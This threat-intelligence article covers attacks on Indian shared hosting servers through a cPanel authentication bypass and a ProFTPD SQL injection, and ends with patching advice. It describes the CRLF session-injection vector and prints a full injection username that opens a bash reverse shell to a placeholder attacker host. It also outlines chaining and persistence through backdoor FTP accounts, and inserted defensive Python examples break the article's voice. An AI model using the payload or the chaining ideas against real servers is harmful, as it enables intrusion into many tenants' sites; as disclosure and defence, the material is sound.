500 Websites on One Box: India's Shared Hosting Attack Surface
India's shared hosting market runs almost entirely on cPanel, and the entire stack lives on one box. In the last 30 days, cPanel's authentication was bypassed as a zero-day for two months (CVE-2026-41940), ProFTPD's SQL escaping logic was defeated with dollar-quoted payloads (CVE-2026-42167), and 2,100 Indian servers were confirmed compromised. We mapped the compound attack surface, the CERT-In advisory gap, and what the EIG/Newfold consolidation means for three of India's largest hosting brands sharing one patching decision.
Published
May 14, 2026
Category
Threat Intelligence
Author
Krishna Agarwal
A typical Indian shared hosting server runs cPanel, Apache, MySQL, Exim, Dovecot, Roundcube, BIND, and an FTP daemon — all on a single machine. Between 200 and 1,000 customer accounts share that machine, isolated from each other by Unix permissions and, if the provider bothered, CloudLinux's CageFS. There are no containers, no VMs between tenants, no microservices decomposition. When one service falls, everything behind it is exposed.
In the last 30 days, two of those services fell hard.
The Stack
Before we get to the vulnerabilities, it's worth looking at what actually runs on one of these servers. This is the standard cPanel shared hosting deployment, the kind that powers the majority of India's web presence.
Typical Indian Shared Hosting Server (diagram; only its first entry survived extraction):
cPanel/WHM (ports 2083, 2087, 2095, 2096): cpsrvd, a single binary that handles all panel traffic
That's at least 18 externally reachable ports serving 6 distinct services through one kernel. Every one of those services has had critical vulnerabilities in the past 12 months. Two of them, cPanel's cpsrvd daemon and ProFTPD's mod_sql module, were hit within days of each other in late April 2026.
The First Crack, cPanel's Two-Month Zero-Day
CVE-2026-41940 is a pre-authentication bypass in cPanel & WHM's session handling (CVSS 9.8). The full technical breakdown has been covered by watchTowr; we won't repeat their analysis. What matters for this piece is what the vulnerability means for the hosting stack.
The attack injects CRLF characters into a session file via a malformed Authorization: Basic header, writing arbitrary key-value pairs, including user=root and tfa_verified=1, into the session before the sanitization code runs. The result: unauthenticated root access to WHM.
Root WHM access on a shared hosting server means access to everything. Every customer's files, every database, every email account, every DNS record. The attacker can read /root/.my.cnf for MySQL root credentials, plant SSH keys, deploy webshells, modify any service configuration on the box. On a server with 500 accounts, that's 500 websites compromised through a single HTTP request to port 2087.
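As an added illustration of a detection check for the header vector described above (not watchTowr's or cPanel's code), this assumes the injected CRLF travels inside the base64-encoded Basic credential, so decoding the credential and looking for control characters exposes the attempt:

```python
import base64
import binascii
from typing import Optional

# Detection helper (added example, not cPanel's code). Assumption: the malformed
# Authorization: Basic header carries the injected CRLF inside the base64-encoded
# user:password credential.

def decode_basic_credential(header_value: str) -> Optional[bytes]:
    """Decoded user:pass bytes of a Basic header; None when the token is not valid base64."""
    _, _, token = header_value.strip().partition(" ")
    try:
        return base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None

def is_suspicious_basic_auth(header_value: str) -> bool:
    """True for a Basic header whose credential holds CR, LF or NUL, or does not decode."""
    scheme, _, _ = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        return False  # other schemes are out of scope for this check
    creds = decode_basic_credential(header_value)
    if creds is None:
        return True  # a Basic token that is not valid base64 is itself anomalous
    return any(marker in creds for marker in (b"\r", b"\n", b"\x00"))

def _basic(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()

# Constructed sample headers: one legitimate login, one carrying CRLF-separated
# key=value lines in the user part (the shape the article describes), one garbage token.
SAMPLE_HEADERS = {
    "legit": _basic("alice", "correct horse"),
    "crlf_injection": _basic("eve\r\nuser=root\r\ntfa_verified=1\r\n", "x"),
    "garbage": "Basic not*base64!",
}

def flagged_samples() -> list:
    """Names of the constructed samples the check would flag, sorted."""
    return sorted(name for name, hdr in SAMPLE_HEADERS.items() if is_suspicious_basic_auth(hdr))
```

A real deployment would run this over the raw request log or in a WAF rule before cpsrvd sees the header, and alert rather than just return a flag.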
cPanel controls approximately 94% of the commercial hosting control panel market. About 1.5 million instances are internet-facing. The vulnerability was exploited as a zero-day starting around February 23, 2026, two full months before the patch shipped on April 28.
CVE-2026-41940, The cPanel Crisis
2026-02-23: Zero-Day Exploitation Begins. Threat actors begin exploiting CVE-2026-41940 in the wild. No patch exists.
2026-04-28: Patch Released. cPanel ships emergency TSR with fix. Advisory published.
2026-04-30: 44,000+ Servers Compromised. Shadowserver and CybelAngel report mass compromise, ~2,100 of those in India.
2026-05-04: Ransomware Deployed. "Sorry" ransomware (Go-based Linux encryptor) found on 7,135 cPanel hosts via Censys.
Nine days before the cPanel patch shipped on April 28, a separate vulnerability was published in ProFTPD. CVE-2026-42167 is a pre-authentication SQL injection in mod_sql affecting every ProFTPD release before 1.3.9a, the entire 1.3.x line (CVSS 8.1).
The bug is in a function called is_escaped_text(), and it's the kind of logic flaw that looks harmless until you see the exploit.
```c
static int is_escaped_text(const char *text, size_t text_len) {
  register unsigned int i;

  /* Must start with a single quote ... */
  if (text[0] != '\'') {
    return FALSE;
  }

  /* ... and end with one ... */
  if (text[text_len-1] != '\'') {
    return FALSE;
  }

  /* ... with no single quote in between. Nothing else is inspected, so SQL
   * syntax that simply avoids single quotes is treated as an escaped value. */
  for (i = 1; i < text_len-1; i++) {
    if (text[i] == '\'') {
      return FALSE;
    }
  }

  return TRUE;
}
```
The function checks whether a string is "already escaped" by looking at three things: does it start with a single quote, does it end with one, and are there any single quotes in between? If all three conditions pass, mod_sql skips escaping entirely and drops the value straight into the SQL statement.
The problem is that an attacker controls the FTP username. The USER command is processed before authentication; it's pre-auth by definition. When ProFTPD logs that username via SQLLog directives (a common configuration, and one ProFTPD's own documentation recommends), the %U format variable gets resolved and checked by is_escaped_text().
A username like this passes the check:
```text
', null, null); COPY (SELECT $$x$$) TO PROGRAM $$bash -c "bash -i >& /dev/tcp/ATTACKER/9998 0>&1"$$; --'
```
It starts with ', ends with ', and contains zero internal single quotes. The injected SQL uses PostgreSQL's dollar-quoting ($$...$$) instead of quotes for its string literals. The function sees a "properly escaped" value and waves it through. The attacker's stacked query executes, and on a PostgreSQL backend with superuser privileges, COPY TO PROGRAM gives them a shell.
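The check, its hardened replacement and a configuration audit, as an added example that is not ProFTPD's code: a Python re-implementation of the is_escaped_text() heuristic shows a harmless constructed dollar-quoted username passing it, an always-escape quoting function shows the fix, and a small parser flags SQLNamedQuery definitions that interpolate %U and the SQLLog directives binding them (the directive syntax assumed is ProFTPD's documented "SQLNamedQuery name type query" and "SQLLog cmd-list query-name").

```python
import re

# Re-implementation of mod_sql's is_escaped_text() heuristic for the demonstration
# (added example, not ProFTPD's code): a value counts as "already escaped" when it
# starts and ends with a single quote and contains none in between.
def is_escaped_text(text: str) -> bool:
    if len(text) < 2 or text[0] != "'" or text[-1] != "'":
        return False
    return "'" not in text[1:-1]

# Constructed, harmless stand-in for the payload shape: SQL syntax that uses a
# PostgreSQL dollar-quoted literal instead of single quotes, so the check passes.
DOLLAR_QUOTED_USERNAME = "', null, null); SELECT $$x$$; --'"

# Hardened alternative: never guess whether a value is escaped. Treat every
# interpolated value as raw, double its single quotes and add the quotes ourselves
# (a parameterised query is better still where the backend API allows it).
def quote_literal(raw: str) -> str:
    return "'" + raw.replace("'", "''") + "'"

# Defender's audit: which SQLNamedQuery definitions interpolate the pre-auth
# username (%U), and which SQLLog directives bind them to FTP commands.
NAMED_RE = re.compile(r"^\s*SQLNamedQuery\s+(\S+)\s+(.*)$", re.IGNORECASE)
LOG_RE = re.compile(r"^\s*SQLLog\s+\S+\s+(\S+)", re.IGNORECASE)

def risky_sqllog_queries(conf_text: str) -> list:
    lines = conf_text.splitlines()
    uses_user = {m.group(1) for ln in lines
                 if (m := NAMED_RE.match(ln)) and "%U" in m.group(2)}
    bound = [m.group(1) for ln in lines if (m := LOG_RE.match(ln))]
    return [name for name in bound if name in uses_user]

# Constructed proftpd.conf fragment: one query logs the username, one does not.
SAMPLE_CONF = """
SQLNamedQuery logfail FREEFORM "INSERT INTO ftplog (usr, ip) VALUES ('%U', '%a')"
SQLNamedQuery countfiles SELECT "count(*) FROM files"
SQLLog ERR_PASS logfail
SQLLog RETR countfiles
"""
```

Until the daemon is upgraded to 1.3.9a, any query name returned by risky_sqllog_queries() is a directive worth removing or rewriting so that the raw username never reaches the SQL backend.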
Backend Matters
The full RCE chain requires PostgreSQL with superuser database privileges. MySQL's default client library does not support stacked queries, which blocks the most dangerous exploitation paths. However, blind SQL injection (data exfiltration via timing side-channels) and backdoor user injection work on all backends that support stacked queries, including SQLite.
ProFTPD ships bundled with cPanel, Plesk, DirectAdmin, and ISPConfig. On cPanel specifically, the default FTP daemon switched to Pure-FTPd around 2014, so most current cPanel installations aren't running ProFTPD — but legacy servers, servers where the admin explicitly chose ProFTPD, and servers running DirectAdmin or ISPConfig are all in scope. Shodan counts 162,329 public ProFTPD instances globally.
The Compound Problem
Either vulnerability alone is severe. Together, on the same server, they're worse than the sum of their parts.
The direct path: CVE-2026-41940 gives root WHM access on any cPanel server. An attacker with WHM root can reconfigure the FTP daemon, switch from Pure-FTPd to ProFTPD, enable mod_sql, add logging directives with %U, and plant backdoor FTP accounts in the database. This creates a persistence mechanism that survives cPanel patching, because the FTP backdoor lives in a separate service and database that the cPanel security update doesn't touch.
The reverse path: On servers already running ProFTPD with mod_sql, CVE-2026-42167 gives database access or limited RCE as the ProFTPD/database user. From there, CVE-2026-41940 on ports 2083/2087 escalates to full root WHM, compromising every tenant.
But the compound problem isn't really about chaining these two CVEs. It's about the architecture.
[Diagram: Attack surface of a typical Indian shared hosting server]
Every externally reachable service on that server has had a critical or high-severity vulnerability disclosed in the past 12 months. Exim shipped four CVEs in April 2026 alone (CVE-2026-40684 through 40687, crash via DNS PTR, heap corruption, OOB read). Roundcube had a CVSS 9.9 post-auth RCE via PHP object deserialization (CVE-2025-49113), weaponized within 48 hours and added to the CISA KEV catalog. cPanel itself shipped three additional CVEs (29201, 29202, 29203) on May 8, just ten days after the authentication bypass patch.
This is what a monolithic deployment looks like when the vulnerability rate exceeds the patching rate.
2,100 Indian Servers
India is the second-largest geographic market for cPanel, with roughly 16-17% of cPanel's global customer base. When CVE-2026-41940 hit, the Shadowserver Foundation's geographic breakdown showed 2,100 likely-compromised cPanel instances in India, servers that were not only exploited but actively being used as attack infrastructure, scanning and brute-forcing other targets.
That 2,100 is a floor. It only counts servers that Shadowserver's honeypots observed attacking outward. The number of compromised-but-quiet Indian servers, the ones used for data theft, ransomware staging, or credential harvesting without generating observable scanning traffic, is certainly higher.
CVE-2026-41940, Compromised cPanel Instances by Country (Shadowserver, April 30)
United States: 15,200 (50%)
France: 4,300 (14%)
Germany: 4,200 (14%)
United Kingdom: 2,300 (8%)
India: 2,100 (7%)
Canada: 2,100 (7%)
CERT-In, India's national Computer Emergency Response Team, appears to have issued no specific advisory for CVE-2026-41940. We searched the CERT-In advisory database and found no guidance about the cPanel authentication bypass, despite 2,100+ Indian instances being confirmed compromised. The most recent CERT-In advisory at the time of the cPanel crisis covered Intel processor vulnerabilities (CIAD-2026-0013, March 12). For a vulnerability affecting India's web hosting infrastructure at this scale, the silence is notable.
The Consolidation Problem
India's hosting market has a concentration risk that amplifies infrastructure-class vulnerabilities.
Endurance International Group, now Newfold Digital, owns BigRock, HostGator India, Bluehost India, and ResellerClub. In July 2025, both HostGator India and Bluehost India were migrated onto BigRock's server infrastructure. What customers perceive as three competing hosting brands is, at the infrastructure level, one fleet of servers managed by one operations team making one patching decision.
If BigRock is slow to patch, three brands are simultaneously vulnerable. If BigRock's infrastructure is breached, three brands' customers are simultaneously exposed. The consolidation that made economic sense for Newfold Digital created a single point of failure for a significant portion of India's shared hosting market.
We don't know BigRock's specific patching timeline for CVE-2026-41940. But the Shadowserver data shows that 48 hours after the patch was available, thousands of Indian cPanel instances were still compromised, and some of those almost certainly belong to the EIG/Newfold portfolio.
What This Means
The Indian shared hosting market runs primarily on cPanel. cPanel runs everything on one box. That box exposes half a dozen services to the internet, each with its own vulnerability history, and isolates tenants from each other using filesystem permissions and, if the provider pays for CloudLinux, lightweight process containers. There's no defense in depth between a compromised control panel and a customer's WordPress database.
The cPanel authentication bypass alone was bad enough: pre-auth, unauthenticated, root access, exploited as a zero-day for two months. Combined with ProFTPD's SQL injection, Exim's memory corruption bugs, and Roundcube's deserialization RCE, the picture for anyone relying on Indian shared hosting is grim.
If you operate an Indian hosting provider:
Verify you're running cPanel 136.0.5 or later (patches CVE-2026-41940 and the May 8 CVEs)
If running ProFTPD, upgrade to 1.3.9a or switch to Pure-FTPd
Audit your Exim version — 4.99.2 fixes the April 2026 memory safety issues
Check Roundcube — CVE-2025-49113 is in the CISA KEV catalog
Consider whether `ServerTokens Prod` is actually helping or just hiding your version from your own security audits
Review your cPanel update tier — EDGE and CURRENT get patches faster than RELEASE
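As an added example (not the article's own tooling), a version gate that applies the minimum versions named in the checklist to an inventory of observed versions; the cPanel version-file format ("11." prefix) is an assumption, and Roundcube is left out because the article cites CVE-2025-49113 without a fixed version:

```python
import re

# Minimum fixed versions the checklist names (cPanel, ProFTPD, Exim). Roundcube is
# omitted: the article gives no version for CVE-2025-49113, so use the vendor advisory.
REQUIRED = {"cpanel": "136.0.5", "proftpd": "1.3.9a", "exim": "4.99.2"}

def parse_version(v: str) -> tuple:
    """Split 'a.b.c' into ((a, ''), (b, ''), (c, '')); a trailing letter suffix such
    as the 'a' in 1.3.9a sorts after the bare number."""
    parts = []
    for tok in v.strip().split("."):
        m = re.fullmatch(r"(\d+)([A-Za-z]*)", tok)
        if not m:
            raise ValueError(f"unparseable version component {tok!r} in {v!r}")
        parts.append((int(m.group(1)), m.group(2).lower()))
    return tuple(parts)

def version_at_least(observed: str, required: str) -> bool:
    a, b = parse_version(observed), parse_version(required)
    width = max(len(a), len(b))
    a += ((0, ""),) * (width - len(a))  # pad so 1.3 compares like 1.3.0
    b += ((0, ""),) * (width - len(b))
    return a >= b

def normalise_cpanel(v: str) -> str:
    """Assumption: /usr/local/cpanel/version reports '11.<major>.<minor>.<patch>';
    drop the legacy '11.' prefix so the value compares against '136.0.5'."""
    return v[3:] if v.startswith("11.") else v

def outdated_components(observed: dict) -> list:
    """Names of components below the required version. Components absent from the
    inventory (e.g. Pure-FTPd in place of ProFTPD) are skipped, not flagged."""
    result = []
    for name, required in REQUIRED.items():
        current = observed.get(name)
        if current is None:
            continue
        if name == "cpanel":
            current = normalise_cpanel(current)
        if not version_at_least(current, required):
            result.append(name)
    return result

# Constructed sample of what an inventory script might collect from one server.
SAMPLE_INVENTORY = {"cpanel": "11.136.0.4", "proftpd": "1.3.8", "exim": "4.99.2"}
```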
If you're hosted on Indian shared hosting:
You cannot control the patching timeline. Your hosting provider decides when your server gets patched.
A root-level compromise of your server exposes every tenant, not just the one that was targeted. Your site can be collateral damage.
If your hosting provider runs BigRock, HostGator India, or Bluehost India infrastructure, understand that these are the same servers managed by the same team.
CVE-2026-41940 was discovered and analyzed by watchTowr Labs. CVE-2026-42167 was discovered by ZeroPath (LeftenantZero). Shadowserver Foundation provided the geographic compromise data. Shodan and CybelAngel provided exposure statistics.